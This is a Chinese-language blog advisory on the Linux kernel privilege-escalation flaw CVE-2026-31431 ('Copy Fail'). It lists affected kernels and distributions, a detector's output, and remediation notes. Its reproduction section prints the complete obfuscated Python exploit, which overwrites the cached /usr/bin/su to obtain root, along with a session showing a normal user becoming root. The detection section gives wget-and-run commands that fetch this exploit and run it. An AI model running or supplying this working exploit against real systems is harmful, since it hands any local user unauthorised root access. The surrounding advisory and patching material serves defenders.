当前位置:首页>Linux>Linux内核高危漏洞,90%会中招,重要!!!

Linux内核高危漏洞,90%会中招,重要!!!

  • 2026-10-11 08:17:45
Linux内核高危漏洞,90%会中招,重要!!!
一、漏洞信息
项目
内容
CVE 编号
CVE-2026-31431
漏洞名称
Copy Fail
发现者
Theori 安全团队 / Xint Code AI 平台
披露时间
2026 年 4 月 29 日
CVSS 评分
7.8(高危)
影响范围
Linux 内核 4.14 ~ 6.18(2017年至今)
利用条件
只需一个普通本地账号,无需网络,无需特殊权限
二、影响范围

目前,该漏洞影响默认启用或可加载algif_aead模块的Linux系统,已知受影响的产品如下:

受影响的内核版本

漏洞代码随 commit 72548b093ee3 在 2017 年引入,修复 commit a664bf3d603d 于 2026 年 4 月 1 日合并主线。

状态
内核版本范围
不受影响(太老)
Linux kernel < 4.14(如 CentOS 7 的 3.10)
受影响
Linux kernel 4.14 ~ 6.18(未打补丁)
已修复
包含修复 commit 的 6.12.x / 6.17.x / 6.18.x 及以上

受影响的发行版

发行版
状态
Ubuntu(所有 LTS)
✅ 受影响,已推送修复
Debian
✅ 受影响,已推送修复
RHEL 8 / 9
✅ 受影响,已推送修复
Rocky Linux / AlmaLinux
✅ 受影响,已推送修复
SUSE / openSUSE
✅ 受影响,已推送修复
Amazon Linux 2023
✅ 受影响,已推送修复
Fedora
✅ 受影响,已推送修复
Arch Linux
✅ 受影响,已推送修复
Anolis OS 7.9(ANCK)
✅ 受影响(4.19 内核),待修复
CentOS 7.9
❌ 不受影响(3.10 内核,早于漏洞引入)
RHEL 6 / CentOS 6
❌ 不受影响(内核过老)

受影响的架构

不限架构,以下均受影响:

  • x86_64(AMD/Intel)
  • aarch64(ARM 64位)
  • RISC-V
  • LoongArch
  • s390x(IBM Z)

同一份 Python 脚本无需修改即可跨架构利用。

这个影响范围真的挺大的(不是标题党吧),我们的生产环境很多中招了。
三、漏洞复现
(mxsieve) [deploy@b95 ~]$ git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.gitCloning into 'copy-fail-CVE-2026-31431'remote: Enumerating objects: 9, done.remote: Counting objects: 100% (9/9), done.emote: Compressing objects: 100% (8/8), done.remote: Total 9 (delta 1), reused 3 (delta 0), pack-reused 0 (from 0)Receiving objects: 100% (9/9), done.Resolving deltas: 100% (1/1), done.(mxsieve) [deploy@b95 ~]$ cd copy-fail-CVE-2026-31431-main# python版本要大于3.10要不运行报错, 运行脚本直接切换成root 用户!!! 😱😱😱(mxsieve) [deploy@b95 copy-fail-CVE-2026-31431-main]$ python copy_fail_exp.py (base) [root@b95 copy-fail-CVE-2026-31431-main]# (base) [root@b95 copy-fail-CVE-2026-31431-main]# whoami root(base) [root@b95 copy-fail-CVE-2026-31431-main]# ls /root/anaconda-ks.cfg  miniconda3  Modelfile  mxsieve2  ollama  print-diskinfo.sh  __pycache__(base) [root@b95 copy-fail-CVE-2026-31431-main]# (base) [root@b95 copy-fail-CVE-2026-31431-main]# cat copy_fail_exp.py #!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")(base) [root@b95 copy-fail-CVE-2026-31431-main]# 
四、漏洞检测
# 破坏性检查:会直接切换到rootwget https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/main/copy_fail_exp.pypython copy_fail_exp.py# 非破坏性检查:只检查风险wget https://raw.githubusercontent.com/rootsecdev/cve_2026_31431/main/test_cve_2026_31431.py# 我这个机器就中招了,下面是提示python test_cve_2026_31431.py[*] CVE-2026-31431 detector  kernel=4.19.91-25.3.an7.x86_64  arch=x86_64[i] Kernel 4.19.91-25.3.an7.x86_64 predates the affected 6.12/6.17/6.18 lines; trigger may not apply even if prerequisites match.[+] AF_ALG + 'authencesn(hmac(sha256),cbc(aes))' loadable - precondition met.[!] VULNERABLE to CVE-2026-31431.[!]   Marker b'PWND' (AAD seqno_lo) landed in the spliced page-cache page at offset 0.[!]   Surrounding bytes: 50574e444641494c2d53454e  (b'PWNDFAIL-SEN')[!] Apply the upstream fix or block algif_aead immediately.

五、漏洞修复

最好的办法就是升级内核版本。
很多情况下可能环境比较老旧比如很多rhel系的系统官方早己不再维护。
并且这个模块很多是集成到了linux 内核中的,没法通过modprobe等方式禁用模块,这就很坑~
[root@b60 ~]# cat /boot/config-$(uname -r) | grep -E "CONFIG_CRYPTO_USER_API_AEAD|CONFIG_CRYPTO_AUTHENCESN"CONFIG_CRYPTO_USER_API_AEAD=y[root@b60 ~]# find /lib/modules/$(uname -r) -name "algif_aead.ko" 2>/dev/null[root@b60 ~]# cat /lib/modules/$(uname -r)/modules.builtin | grep algif_aeadkernel/crypto/algif_aead.ko[root@b60 ~]#
我们生产有很多anolis系统中招了,我在发文章的时候已经跟 anolis社区反馈了问题,社区正在修复问题中~ 
问了下claude,给了我不少解决方法,比如:

SELinux enforce、eBPF 拦截、限制可登录账号、安装 bpftrace/bcc 后拦截

但感觉都不太靠谱,还是等官方的修复吧~

最新文章

随机文章